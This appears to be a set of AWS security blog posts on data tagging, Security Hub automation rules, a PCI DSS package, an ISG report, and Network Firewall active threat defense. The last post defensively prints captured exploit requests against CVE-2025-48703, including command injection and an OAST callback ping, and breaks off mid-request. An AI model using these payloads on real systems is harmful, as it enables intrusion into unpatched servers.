  2. Non-compliant resources trigger automatic remediation, while compliant resources deploy normally.
  3. Continuous monitoring catches variation from your policies.

The following tagging strategy enables automation:

{ Β Β 
    "MandatoryTags": { Β Β  Β 
        "DataClassification": ["L1", "L2", "L3"], Β Β  Β 
        "DataOwner": "<Department/Team Name>", Β Β  Β 
        "Compliance": ["PCI", "SOX", "GDPR", "None"], Β Β  Β 
        "Environment": ["Prod", "Dev", "Test", "Stage"], Β Β  Β 
        "CostCenter": "<Business Unit Code>" Β Β 
    }, Β Β 
    "OptionalTags": { Β Β  Β 
        "BackupFrequency": ["Daily", "Weekly", "Monthly"], Β Β  Β 
        "RetentionPeriod": "<Time in Months>", Β Β  Β 
        "ProjectCode": "<Project Identifier>", Β Β  Β 
        "DataResidency": "<Region/Country>" Β Β 
    } 
}

While AWS Organizations tag policies provide a foundation for consistent tagging, comprehensive tag governance requires additional enforcement mechanisms, which we explore in detail in Part 2.

Conclusion

This first part of the two-part series established the foundational elements of implementing data governance on AWS, covering data classification frameworks, effective tagging strategies, and organizational alignment requirements. These fundamentals serve as building blocks for scalable and automated governance approaches. Part 2 focuses on technical implementation and architectural patterns, including monitoring foundations, preventive controls, and automated remediation. The discussion extends to tag-based security controls, compliance monitoring automation, and governance integration with disaster recovery strategies. Additional topics include data sovereignty controls and machine learning model governance with Amazon SageMaker, supported by AWS implementation examples.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Tushar Jain Omar Ahmed
Omar Ahmed is an Auto and Manufacturing Solutions Architect who specializes in analytics. Omar’s journey in cloud computing began as an AWS data center operations technician, where he developed hands on infrastructure expertise. Outside of work, he enjoys motorsports, gaming, and swimming.
Will Black Omar Mahmoud
Omar is a Solutions Architect helping small-medium businesses with their cloud journey. He specializes in Amazon Connect and next-gen developer services like Kiro. Omar began at AWS as a data center operations technician, gaining hands-on cloud infrastructure experience. Outside work, Omar enjoys gaming, hiking, and soccer.
Fritz Kunstler Changil Jeong
Changil Jeong is a Solutions Architect at Amazon Web Services (AWS) partnering with Independent software vendor customers on their cloud transformation journey, with strong interests in security. He joined AWS as an SDE apprentice before transitioning to SA. Previously served in the U.S. Army as a financial and budgeting analyst and worked at a large IT consulting firm as a SaaS security analyst.
Brian Ruf Paige Broderick
Paige Broderick is a Solutions Architect at Amazon Web Services (AWS) who works with Enterprise customers to help them achieve their AWS objectives. She specializes in cloud operations, focusing on governance and using AWS to develop smart manufacturing solutions. Outside of work, Paige is an avid runner and is likely training for her next marathon.

Streamline security response at scale with AWS Security Hub automation

13 January 2026 at 18:45

A new version of AWS Security Hub, is now generally available, introducing new ways for organizations to manage and respond to security findings. The enhanced Security Hub helps you improve your organization’s security posture and simplify cloud security operations by centralizing security management across your Amazon Web Services (AWS) environment. The new Security Hub transforms how organizations handle security findings through advanced automation capabilities with real-time risk analytics, automated correlation, and enriched context that you can use to prioritize critical issues and reduce response times. Automation also helps ensure consistent response procedures and helps you meet compliance requirements.

AWS Security Hub CSPM (cloud security posture management) is now an integral part of the detection engines for Security Hub. Security Hub provides centralized visibility across multiple AWS security services to give you a unified view of your cloud environment, including risk-based prioritization views, attack path visualization, and trend analytics that help you understand security patterns over time.

This is the third post in our series on the new Security Hub capabilities. In our first post, we discussed how Security Hub unifies findings across AWS services to streamline risk management. In the second post, we shared the steps to conduct a successful Security Hub proof of concept (PoC).

In this post, we explore how you can enhance your security operations using AWS Security Hub automation rules and response automation.

We walk through the setup and configuration of automation rules, share best practices for creating effective response workflows, and provide real-world examples of how these tools can be used to automate remediation, escalate high-severity findings, and support compliance requirements.

Security Hub automation enables automatic response to security findings to help ensure critical findings reach the right teams quickly, so that they can reduce manual effort and response time for common security incidents while maintaining consistent remediation processes.

Note: Automation rules evaluate new and updated findings that Security Hub generates or ingests after you create them, not historical findings. These automation capabilities help ensure critical findings reach the right teams quickly.

Why automation matters in cloud security

Organizations often operate across hundreds of AWS accounts, multiple AWS Regions, and diverse servicesβ€”each producing findings that must be triaged, investigated, and acted upon. Without automation, security teams face high volumes of alerts, duplication of effort, and the risk of delayed responses to critical issues.

Manual processes can’t keep pace with cloud operations; automation helps solve this by changing your security operations in three ways. Automation filters and prioritizes findings based on your criteria, showing your team only relevant alerts. When issues are detected, automated responses trigger immediatelyβ€”no manual intervention needed.

If you’re managing multiple AWS accounts, automation applies consistent policies and workflows across your environment through centralized management, shifting your security team from chasing alerts to proactively managing risk before issues escalate.

Designing routing strategies for security findings

With Security Hub configured, you’re ready to design a routing strategy for your findings and notifications. When designing your routing strategy, ask whether your existing Security Hub configuration meets your security requirements. Consider whether Security Hub automations can help you meet security framework requirements like NIST 800-53 and identify KPIs and metrics to measure whether your routing strategy works.

Security Hub automation rules and automated responses can help you meet the preceding requirements, however it’s important to understand how your compliance teams, incident responders, security operations personnel, and other security stakeholders operate on a day-to-day basis. For example, do teams use the AWS Management Console for AWS Security Hub regularly? Or do you need to send most findings downstream to an IT systems management (ITSM) tool (such as Jira or ServiceNow) or third-party security orchestration, automation, and response (SOAR) platforms for incident tracking, workflow management, and remediation?

Next, create and maintain an inventory of critical applications. This helps you adjust finding severity based on business context and your incident response playbooks.

Consider the scenario where Security Hub identifies a medium-severity vulnerability on an Elastic Compute Cloud instance. In isolation, this might not trigger immediate action. When you add business contextβ€”such as strategic objectives or business criticalityβ€”you might discover that this instance hosts a critical payment processing application, revealing the true risk. By implementing Security Hub automation rules with enriched context, this finding can be upgraded to critical severity and automatically routed to ServiceNow for immediate tracking. In addition, by using Security Hub automation with Amazon EventBridge, you can trigger an AWS Systems Manager Automation document to isolate the EC2 instance for security forensics work to then be carried out.

Because Security Hub offers OCSF format and schema, you can use the extensive schema elements that OCSF offers you to target findings for automation and help your organization meet security strategy requirements.

Example use cases

Security Hub automation supports many use cases. Talk with your teams to understand which fit your needs and security objectives. The following are some examples of how you can use security hub automation:

Automated finding remediation

Use automated finding remediation to automatically fix security issues as they’re detected.

Supporting patterns:

  • Direct remediation: Trigger AWS Lambda functions to fix misconfigurations
  • Resource tagging: Add tags to non-compliant resources for tracking
  • Configuration correction: Update resource configurations to match security policies
  • Permission adjustment: Modify AWS Identity and Access Management (IAM) policies to remove excessive permissions

Example:

  • IF finding.type = β€œSoftware and Configuration Checks/Industry and Regulatory Standards/CIS AWS Foundations Benchmark”
  • AND finding.title CONTAINS β€œS3 buckets should have server-side encryption enabled”
  • THEN invoke Lambda function β€œenable-s3-encryption”

Security finding workflow integration

Integrate findings into your workflow by routing them to the appropriate teams and systems.

Supporting patterns:

  • Ticket creation: Generate JIRA or ServiceNow tickets for manual review
  • Team assignment: Route findings to specific teams based on resource ownership
  • Severity-based routing: Direct critical findings to incident response, others to regular queues
  • Compliance tracking: Send compliance-related findings to GRC systems

Example:

  • IF finding.severity = β€œCRITICAL” AND finding.productName = β€œAmazon GuardDuty”
  • THEN send to SNS topic β€œsecurity-incident-response-team”
  • ELSE IF finding.productFields.resourceOwner = β€œpayments-team”
  • THEN send to SNS topic β€œpayments-security-review”

Automated finding enrichment

Use finding enrichment to add context to findings to improve triage efficiency.

Supporting patterns:

  • Resource context addition: Add business context, owner information, and data classification
  • Historical analysis: Add information about previous similar findings
  • Risk scoring: Calculate custom risk scores based on asset value and threat context
  • Vulnerability correlation: Link findings to known Common Vulnerabilities and Exposures (CVEs) or threat intelligence

Example:

  • IF finding.type CONTAINS β€œVulnerability/CVE”
  • THEN invoke Lambda function β€œenrich-with-threat-intelligence”

Custom security controls

Use custom security controls to meet organization-specific security requirements.

Supporting patterns:

  • Custom policy enforcement: Check for compliance with internal standards
  • Business-specific rules: Apply rules based on business unit or application type
  • Compensating controls: Implement alternatives when primary controls can’t be applied
  • Temporary exceptions: Handle approved deviations from security standards

Example:

  • IF finding.resourceType = β€œAWS::EC2::Instance” AND
    • finding.resourceTags.Environment = β€œProduction” AND
    • finding.title CONTAINS β€œvulnerable software version”
  • THEN invoke Lambda function β€œenforce-patching-policy”

Compliance reporting and evidence collection

Streamline compliance documentation and evidence gathering.

Supporting patterns:

  • Evidence capture: Store compliance evidence in designated S3 buckets
  • Audit trail creation: Document remediation actions for auditors
  • Compliance dashboarding: Update compliance status metrics
  • Regulatory mapping: Tag findings with relevant compliance frameworks

Example:

  • IF finding.complianceStandards CONTAINS β€œPCI-DSS”
  • THEN invoke Lambda function β€œcapture-pci-compliance-evidence”
  • AND send to SNS topic β€œcompliance-team-notifications”

Set up Security Hub automation

In this section, you’ll walk through enabling up Security Hub and related services and creating automation rules.

Step 1: Enable Security Hub and integrated services

As the first step, follow the instructions in Enable Security Hub.

Note: Security Hub is powered by Amazon GuardDuty, Amazon Inspector, AWS Security Hub CSPM, and Amazon Macie, and these services also need to be enabled to get value from Security Hub.

Step 2: Create automation rules to update finding details and third-party integration

After Security Hub collects findings you can create automation rules to update and route the findings to the appropriate teams. The steps to create automation rules that update finding details or to a set up a third-party integrationβ€”such as Jira or ServiceNowβ€”based on criteria you define can be found in Creating automation rules in Security Hub.

With automation rules, Security Hub evaluates findings against the defined rule and then makes the appropriate finding update or calls the APIs to send findings to Jira or ServiceNow. Security Hub sends a copy of every finding to Amazon EventBridge so that you can also implement your own automated response (if needed) for use cases outside of using Security Hub automation rules.

In addition to sending a copy of every finding to EventBridge, Security Hub classifies and enriches security findings according to business context, then delivers them to the appropriate downstream services (such as ITSM tools) for fast response.

Best practices

AWS Security Hub automation rules offer capabilities for automatically updating findings and integrating with other tools. When implementing automation rules, follow these best practices:

  • Centralized management: Only the Security Hub administrator account can create, edit, delete, and view automation rules. Ensure proper access control and management of this account.
  • Regional deployment: Automation rules can be created in one AWS Region and then applied across configured Regions. When using Region aggregation, you can only create rules in the home Region. If you create an automation rule in an aggregation Region, it will be applied in all included Regions. If you create an automation rule in a non-linked Region, it will be applied only in that Region. For more information, see Creating automation rules in Security Hub.
  • Define specific criteria: Clearly define the criteria that findings must match for the automation rule to apply. This can include finding attributes, severity levels, resource types, or member account IDs.
  • Understand rule order: Rule order matters when multiple rules apply to the same finding or finding field. Security Hub applies rules with a lower numerical value first. If multiple findings have the same RuleOrder, Security Hub applies a rule with an earlier value for the UpdatedAt field first (that is, the rule which was most recently edited applies last). For more information, see Updating the rule order in Security Hub.
  • Provide clear descriptions: Include a detailed rule description to provide context for responders and resource owners, explaining the rule’s purpose and expected actions.
  • Use automation for efficiency: Use automation rules to automatically update finding fields (such as severity and workflow status), suppress low-priority findings, or create tickets in third-party tools such as Jira or ServiceNow for findings matching specific attributes.
  • Consider EventBridge for external actions: While automation rules handle internal Security Hub finding updates, use EventBridge rules to trigger actions outside of Security Hub, such as invoking Lambda functions or sending notifications to Amazon Simple Notification Service (Amazon SNS) topics based on specific findings. Automation rules take effect before EventBridge rules are applied. For more information, see Automation rules in EventBridge.
  • Manage rule limits: This is a maximum limit of 100 automation rules per administrator account. Plan your rule creation strategically to stay within this limit.
  • Regularly review and refine: Periodically review automation rules, especially suppression rules, to ensure they remain relevant and effective, adjusting them as your security posture evolves.

Conclusion

You can use Security Hub automation to triage, route, and respond to findings faster through a unified cloud security solution with centralized management. In this post, you learned how to create automation rules that route findings to ticketing systems integrations and upgrade critical findings for immediate response. Through the intuitive and flexible approach to automation that Security Hub provides, your security teams can make confident, data-driven decisions about Security Hub findings that align with your organization’s overall security strategy.

With Security Hub automation features, you can centrally manage security across hundreds of accounts while your teams focus on critical issues that matter most to your business. By implementing the automation capabilities described in this post, you can streamline response times at scale, reduce manual effort, and improve your overall security posture through consistent, automated workflows.

If you have feedback about this post, submit comments in the Comments section. If you have questions about this post, start a new thread on AWS Security, Identity, and Compliance re:Post or contact AWS Support.
Β 

Ahmed Adekunle Ahmed Adekunle
Ahmed is a Security Specialist Solutions Architect focused on detection and response services at AWS. Before AWS, his background was in business process management and AWS technology consulting, helping customers use cloud technology to transform their business. Outside of work, Ahmed enjoys playing soccer, supporting less privileged activities, traveling, and eating spicy food, specifically African cuisine.
Alex Wadell Alex Waddell
Alex is a Senior Security Specialist Solutions Architect at AWS based in Scotland. Alex provides security architectural guidance and operational best practices to customers of all sizes, helping them implement AWS security services. When not working, Alex enjoys spending time sampling rum from around the world, walking his dogs in the local forest trails, and traveling.
Kyle Shields Kyle Shields
Kyle is a WW Security Specialist Solutions Architect at AWS focused on threat detection and incident response. With over 10 years in cybersecurity and more than 20 years of Army service, he helps customers build effective incident response capabilities while implementing information and cyber security best practices.

Fall 2025 PCI DSS compliance package available now

13 January 2026 at 02:06

Amazon Web Services (AWS) is pleased to announce that two additional AWS services and one additional AWS Region have been added to the scope of our Payment Card Industry Data Security Standard (PCI DSS) certification:

Newly added services:

Newly added AWS Region:

  • Asia Pacific (Taipei)

This certification allows customers to use these services while maintaining PCI DSS compliance, enabling innovation without compromising security. The full list of services can be found on the AWS Services in Scope by Compliance Program. The PCI DSS compliance package includes two key components:

  • Attestation of Compliance (AOC) demonstrating that AWS was successfully validated against the PCI DSS standard.
  • AWS Responsibility Summary provides guidance to help AWS customers understand their responsibility in developing and operating a highly secure environment on AWS for handling payment card data.

AWS was evaluated by Coalfire, a third-party Qualified Security Assessor (QSA).

This refreshed PCI certification offers customers greater flexibility in deploying regulated workloads while reducing compliance overhead. Customers can access the PCI DSS certification through AWS Artifact. This self-service portal provides on-demand access to AWS compliance reports, streamlining audit processes.

AWS is excited to be the first cloud service provider to offer compliance reports to customers in NIST’s Open Security Controls Assessment Language (OSCAL), an open source, machine-readable (JSON) format for security information. The PCI DSS report package (which includes both the PCI DSS AOC and the AWS Responsibility Summary) in OSCAL format is now available separately in AWS Artifact, marking a milestone towards open, standards-based compliance automation. This machine-readable version of the PCI DSS report package enables workflow automation to reduce manual processing time and modernize security and compliance processes. Your use cases for this content are innovative and we want to hear about them through the contact information found in the OSCAL report package.

To learn more about our PCI programs and other compliance and security programs, see the AWS Compliance Programs page. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Compliance Support page.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Tushar Jain Tushar Jain
Tushar is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives Tushar holds a Master of Business Administration from Indian Institute of Management Shillong, India and a Bachelor of Technology in electronics and telecommunication engineering from Marathwada University, India. He has over 13 years of experience in information security and holds CISM, CCSK and CSXF certifications.
Will Black Will Black
Will is a Compliance Program Manager at AWS where he leads multiple security and compliance initiatives. Will has 10 years of experience in compliance and security assurance and holds a degree in Management Information Systems from Temple University. Additionally, he is a PCI Internal Security Assessor (ISA) for AWS and holds the CCSK and ISO 27001 Lead Implementer certifications.
Fritz Kunstler Fritz Kunstler
Fritz is a Principal Security Engineer at AWS, currently focused on AI applications to transform security governance, risk, and compliance. Fritz has been an AWS customer since 2008 and an Amazonian since 2016.
Brian Ruf Brian Ruf
Brian is co-creator of the Open Security Controls Assessment Language (OSCAL). He is an independent consultant at AWS providing modeling and advisory services to ensure accurate and compliant OSCAL generation. Brian has a Bachelor of Information Science from Stockton University. He has 35 years of experience in information technology, including 25 years in cybersecurity, data modeling, and process improvement/automation experience and holds CISSP, CCSP and PMP certifications.

AWS named Leader in the 2025 ISG report for Sovereign Cloud Infrastructure Services (EU)

9 January 2026 at 17:11

For the third year in a row, Amazon Web Services (AWS) is named as a Leader in the Information Services Group (ISG) Provider LensTM Quadrant report for Sovereign Cloud Infrastructure Services (EU), published on January 9, 2026. ISG is a leading global technology research, analyst, and advisory firm that serves as a trusted business partner to more than 900 clients. This ISG report evaluates 19 providers of sovereign cloud infrastructure services in the multi-public-cloud environment and examines how they address the key challenges that enterprise clients face in the European Union (EU). ISG defines Leaders as providers who represent innovative strength and competitive stability.

ISG rated AWS ahead of other leading cloud providers on both the competitive strength and portfolio attractiveness axes, with the highest score on portfolio attractiveness. Competitive strength was assessed on multiple factors, including degree of awareness, core competencies, and go-to-market strategy. Portfolio attractiveness was assessed on multiple factors, including scope of portfolio, portfolio quality, strategy and vision, and local characteristics.

According to ISG, β€œAWS’s infrastructure provides robust resilience and availability, supported by a sovereign-by-design architecture that ensures data residency and regional independence.”

Read the report to:

  • Discover why AWS was named as a Leader with the highest score on portfolio attractiveness by ISG.
  • Gain further understanding on how the AWS Cloud is sovereign-by-design and how it continues to offer more control and more choice without compromising on the full power of AWS.
  • Learn how AWS is delivering on its Digital Sovereignty Pledge and is investing in an ambitious roadmap of capabilities for data residency, granular access restriction, encryption, and resilience.

AWS’s recognition as a Leader in this report for the third consecutive year underscores our commitment to helping European customers and partners meet their digital sovereignty and resilience requirements. We are building on the strong foundation of security and resilience that has underpinned AWS services, including our long-standing commitment to customer control over data residency, our design principal of strong regional isolation, our deep European engineering roots, and our more than a decade of experience operating multiple independent clouds for the most critical and restricted workloads.

Download the full 2025 ISG Provider Lens Quadrant report for Sovereign Cloud Infrastructure Services (EU).

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Β 

Brittany Bunch Brittany Bunch
Brittany is a Product Marketing Manager on the AWS Security Marketing team based in Atlanta. She focuses on digital sovereignty and brings over a decade of experience in brand marketing, including employer branding at Amazon. Prior to AWS, she led brand marketing initiatives at several large enterprise companies.

Real-time malware defense: Leveraging AWS Network Firewall active threat defense

8 January 2026 at 17:01

Cyber threats are evolving faster than traditional security defense can respond; workloads with potential security issues are discovered by threat actors within 90 seconds, with exploitation attempts beginning within 3 minutes. Threat actors are quickly evolving their attack methodologies, resulting in new malware variants, exploit techniques, and evasion tactics. They also rotate their infrastructureβ€”IP addresses, domains, and URLs. Effectively defending your workloads requires quickly translating threat data into protective measures and can be challenging when operating at internet scale. This post describes how AWS active threat defense for AWS Network Firewall can help to detect and block these potential threats to protect your cloud workloads.

Active threat defense detects and blocks network threats by drawing on real-time intelligence gathered through MadPot, the network of honeypot sensors used by Amazon to actively monitor attack patterns. Active threat defense rules treat speed as a foundational tenet, not an aspiration. When threat actors create a new domain to host malware or set up fresh command-and-control servers, MadPot sees them in action. Within 30 minutes of receiving new intelligence from MadPot, active threat defense automatically translates that intelligence into threat detection through Amazon GuardDuty and active protection through AWS Network Firewall.

Speed alone isn’t enough without applying the right threat indicators to the right mitigation controls. Active threat defense disrupts attacks at every stage: it blocks reconnaissance scans, prevents malware downloads, and severs command-and-control communications between compromised systems and their operators. This creates a multi-layered defense approach that can disrupt attacks that can bypass some of the layers.

How active threat defense works

MadPot honeypots mimic cloud servers, databases, and web applicationsβ€”complete with the misconfigurations and security gaps that threat actors actively hunt for. When threat actors take the bait and launch their attacks, MadPot captures the complete attack lifecycle against these honeypots, mapping the threat actor infrastructure, capturing emerging attack techniques, and identifying novel threat patterns. Based on observations in MadPot, we also identify infrastructure with similar fingerprints through wider scans of the internet.

Figure 1: Overview of active threat defense integration

Figure 1: Overview of active threat defense integration

Figure 1 shows how this works. When threat actors deliver malware payloads to MadPot honeypots, AWS executes the malicious code in isolated environments, extracting indicators of compromise from the malware’s behaviorβ€”the domains it contacts, the files it drops, the protocols it abuses. This threat intelligence feeds active threat defense’s automated protection: Active threat defense validates indicators, converts them to firewall rules, tests for performance impact, and deploys them globally to Network Firewallβ€”all within 30 minutes. And because threats evolve, active threat defense monitors changes in threat actor infrastructure, automatically updating protection rules as threat actors rotate domains, shift IP addresses, or modify their tactics. Active threat defense adapts automatically as threats evolve.

Figure 2: Swiss cheese model

Figure 2: Swiss cheese model

Active threat defense uses the Swiss cheese model of defense (shown in Figure 2)β€”a principle recognizing that no single security control is perfect, but multiple imperfect layers create robust protection when stacked together. Each defensive layer has gaps. Threat actors can bypass DNS filtering with direct IP connections, encrypted traffic defeats HTTP inspection, domain fronting or IP-only connections evade TLS SNI analysis. Active threat defense applies threat indicators across multiple inspection points. If threat actors bypass one layer, other layers can still detect and block them. When MadPot identifies a malicious domain, Network Firewall doesn’t only block the domain, it also creates rules that deny DNS queries, block HTTP host headers, prevent TLS connections using SNI, and drop direct connections to the resolved IP addresses. Similar to Swiss cheese slices stacked together, the holes rarely alignβ€”and active threat defense reduces the likelihood of threat actors finding a complete path to their target.

Disrupting the attack kill chain with active threat defense

Let’s look at how active threat defense disrupts threat actors across the entire attack lifecycle with this Swiss cheese approach. Figure 3 illustrates an example attack methodologyβ€”described in the following sectionsβ€”that threat actors use to compromise targets and establish persistent control for malicious activities. Modern attacks require network communications at every stageβ€”and that’s precisely where active threat defense creates multiple layers of defense. This attack flow demonstrates the importance of network-layer security controls that can intercept and block malicious communications at each stage, preventing successful compromise even when initial vulnerabilities exist.

Figure 3: An example flow of an attack scenario using an OAST technique

Figure 3: An example flow of an attack scenario using an OAST technique

Step 0: Infrastructure preparation

Before launching attacks, threat actors provision their operational infrastructure. For example, this includes setting up an out-of-band application security testing (OAST) callback endpointβ€”a reconnaissance technique that threat actors use to verify successful exploitation through separate communication channels. They also provision malware distribution servers hosting the payloads that will infect victims, and command-and-control (C2) servers to manage compromised systems. MadPot honeypots detect this infrastructure when threat actors use it against decoy systems, feeding those indicators into active threat detection protection rules.

Step 1: Target identification

Threat actors compile lists of potential victims through automated internet scanning or by purchasing target lists from underground markets. They’re looking for workloads running vulnerable software, exposed services, or common misconfigurations. MadPot honeypot system experiences more than 750 million such interactions with potential threat actors every day. New MadPot sensors are discovered within 90 seconds; this visibility reveals patterns that would otherwise go unnoticed. Active threat detection doesn’t stop reconnaissance but uses MadPot’s visibility to disrupt later stages.

Step 2: Vulnerability confirmation

The threat actor attempts to verify a vulnerability in the target workload, embedding an OAST callback mechanism within the exploit payload. This might take the form of a malicious URL like http://malicious-callback[.]com/verify?target=victim injected into web forms, HTTP headers, API parameters, or other input fields. Some threat actors use OAST domain names that are also used by legitimate security scanners, while others use more custom domains to evade detection. The following table list 20 example vulnerabilities that threat actors tried to exploit against MadPot using OAST links over the past 90 days.

CVE ID Vulnerability name
CVE-2017-10271 Oracle WebLogic Server deserialization remote code execution (RCE)
CVE-2017-11610 Supervisor XML-RPC authentication bypass
CVE-2020-14882 Oracle WebLogic Server console RCE
CVE-2021-33690 SAP NetWeaver server side request forgery (SSRF)
CVE-2021-44228 Apache Log4j2 RCE
CVE-2022-22947 VMware Spring Cloud gateway RCE
CVE-2022-22963 VMware Tanzu Spring Cloud function RCE
CVE-2022-26134 Atlassian Confluence Server and Data Center RCE
CVE-2023-22527 Atlassian Confluence Data Center and Server template injection vulnerability
CVE-2023-43208 NextGen Healthcare Mirth connect RCE
CVE-2023-46805 Ivanti Connect Secure and Policy Secure authentication bypass vulnerability
CVE-2024-13160 Ivanti Endpoint Manager (EPM) absolute path traversal vulnerability
CVE-2024-21893 Ivanti Connect Secure, Policy Secure, and Neurons server-side request forgery (SSRF) vulnerability
CVE-2024-36401 OSGeo GeoServer GeoTools eval injection vulnerability
CVE-2024-37032 Ollama API server path traversal
CVE-2024-51568 CyberPanel RCE
CVE-2024-8883 Keycloak redirect URI validation vulnerability
CVE-2025-34028 Commvault Command Center path traversal vulnerability

Step 3: OAST callback

When vulnerable workloads process these malicious payloads, they attempt to initiate callback connections to the threat actor’s OAST monitoring servers. These callback signals would normally provide the threat actor with confirmation of successful exploitation, along with intelligence about the compromised workload, vulnerability type, and potential attack progression pathways. Active threat detection breaks the attack chain at this point. MadPot identifies the malicious domain or IP address and adds it to the active threat detection deny list. When the vulnerable target attempts to execute the network call to the threat actor’s OAST endpoint, Network Firewall with active threat detection enabled blocks the outbound connection. The exploit might succeed, but without confirmation, the threat actor can’t identify which targets to pursueβ€”stalling the attack.

Step 4: Malware delivery preparation

After the threat actor identifies a vulnerable target, they exploit the vulnerability to deliver malware that will establish persistent access. The following table lists 20 vulnerabilities that threat actors tried to exploit against MadPot to deliver malware over the past 90 days:

CVE ID Vulnerability name
CVE-2017-12149 Jboss Application Server remote code execution (RCE)
CVE-2020-7961 Liferay Portal RCE
CVE-2021-26084 Confluence Server and Data Center RCE
CVE-2021-41773 Apache HTTP server path traversal and RCE
CVE-2021-44228 Apache Log4j2 RCE
CVE-2022-22954 VMware Workspace ONE access and identity manager RCE
CVE-2022-26134 Atlassian Confluence Server and Data Center RCE
CVE-2022-44877 Control Web Panel or CentOS Web Panel RCE
CVE-2023-22527 Confluence Data Center and Server RCE
CVE-2023-43208 NextGen Healthcare Mirth Connect RCE
CVE-2023-46604 Java OpenWire protocol marshaller RCE
CVE-2024-23692 Rejetto HTTP file server RCE
CVE-2024-24919 Check Point security gateways RCE
CVE-2024-36401 GeoServer RCE
CVE-2024-51567 CyberPanel RCE
CVE-2025-20281 Cisco ISE and Cisco ISE-PIC RCE
CVE-2025-20337 Cisco ISE and Cisco ISE-PIC RCE
CVE-2025-24016 Wazuh RCE
CVE-2025-47812 Wing FTP RCE
CVE-2025-48703 CyberPanel RCE

Step 5: Malware download

The compromised target attempts to download the malware payload from the threat actor’s distribution server, but active threat defense intervenes again. The malware hosting infrastructureβ€”whether it’s a domain, URL, or IP addressβ€”has been identified by MadPot and blocked by Network Firewall. If malware is delivered through TLS endpoints, active threat defense has rules that inspect the Server Name Indication (SNI) during the TLS handshake to identify and block malicious domains without decrypting traffic. For malware not delivered through TLS endpoints or customers who have enabled the Network Firewall TLS inspection feature, active threat defense rules inspect full URLs and HTTP headers, applying content-based rules before re-encrypting and forwarding legitimate traffic. Without successful malware delivery and execution, the threat actor cannot establish control.

Step 6: Command and control connection

If malware had somehow been delivered, it would attempt to phone home by connecting to the threat actor’s C2 server to receive instructions. At this point, another active threat defense layer activates. In Network Firewall, active threat defense implements mechanisms across multiple protocol layers to identify and block C2 communications before they facilitate sustained malicious operations. At the DNS layer, Network Firewall blocks resolution requests for known-malicious C2 domains, preventing malware from discovering where to connect. At the TCP layer, Network Firewall blocks direct connections to C2 IP addresses and ports. At the TLS layerβ€”as described in Step 5β€”Network Firewall uses SNI inspection and fingerprinting techniquesβ€”or full decryption when enabledβ€”to identify encrypted C2 traffic. Network Firewall blocks the outbound connection to the known-malicious C2 infrastructure, severing the threat actor’s ability to control the infected workload. Even if malware is present on the compromised workload, it’s effectively neutralized by being isolated and unable to communicate with its operator. Similarly, threat detection findings are created in Amazon GuardDuty for attempts to connect to the C2, so you can initiate incident response workflows. The following table lists examples of C2 frameworks that MadPot and our internet-wide scans have observed over the past 90 days:

Command and control frameworks
Adaptix Metasploit
AsyncRAT Mirai
Brute Ratel Mythic
Cobalt Strike Platypus
Covenant Quasar
Deimos Sliver
Empire SparkRAT
Havoc XorDDoS

Step 7: Attack objectives blocked

Without C2 connectivity, the threat actor cannot steal data or exfiltrate credentials. The layered approach used by active threat defense means threat actors must succeed at every step, while you only need to block one stage to stop the activity. This defense-in-depth approach reduces risk even if some defense layers have vulnerabilities. You can track active threat defense actions in the Network Firewall alert log.

Real attack scenario – Stopping a CVE-2025-48703 exploitation campaign

In October 2025, AWS MadPot honeypots began detecting an attack campaign targeting Control Web Panel (CWP)β€”a server management platform used by hosting providers and system administrators. The threat actor was attempting to exploit CVE-2025-48703, a remote code execution vulnerability in CWP, to deploy the Mythic C2 framework. While Mythic is an open source command and control platform originally designed for legitimate red team operations, threat actors also adopt it for malicious campaigns. The exploit attempts originated from IP address 61.244.94[.]126, which exhibited characteristics consistent with a VPN exit node.

To confirm vulnerable targets, the threat actor attempted to execute operating system commands by exploiting the CWP file manager vulnerability. MadPot honeypots received exploitation attempts like the following example using the whoami command:

POST /nginx/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:49153
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 455

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/nginx
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

whoami /priv
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

While this specific campaign didn’t use OAST callbacks for vulnerability confirmation, MadPot observes similar CVE-2025-48703 exploitation attempts using OAST callbacks like the following example:

POST /debian/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:8085
user-agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
content-length: 503
content-type: multipart/form-data; boundary=z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
accept-encoding: gzip
connection: close

--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="fileName"

.bashrc
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="currentPath"

/home/debian
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="recursive"

--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="t_total"

ping d4c81ab7l0phir01tus0888p1xozqw1bs.oast[.]fun
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5--

After the vulnerable systems were identified, the attack moved immediately to payload delivery. MadPot captured infection attempts targeting both Linux and Windows workloads. For Linux targets, the threat actor used curl and wget to download the malware:

POST /cwp/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:5704
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 539

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/cwp
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
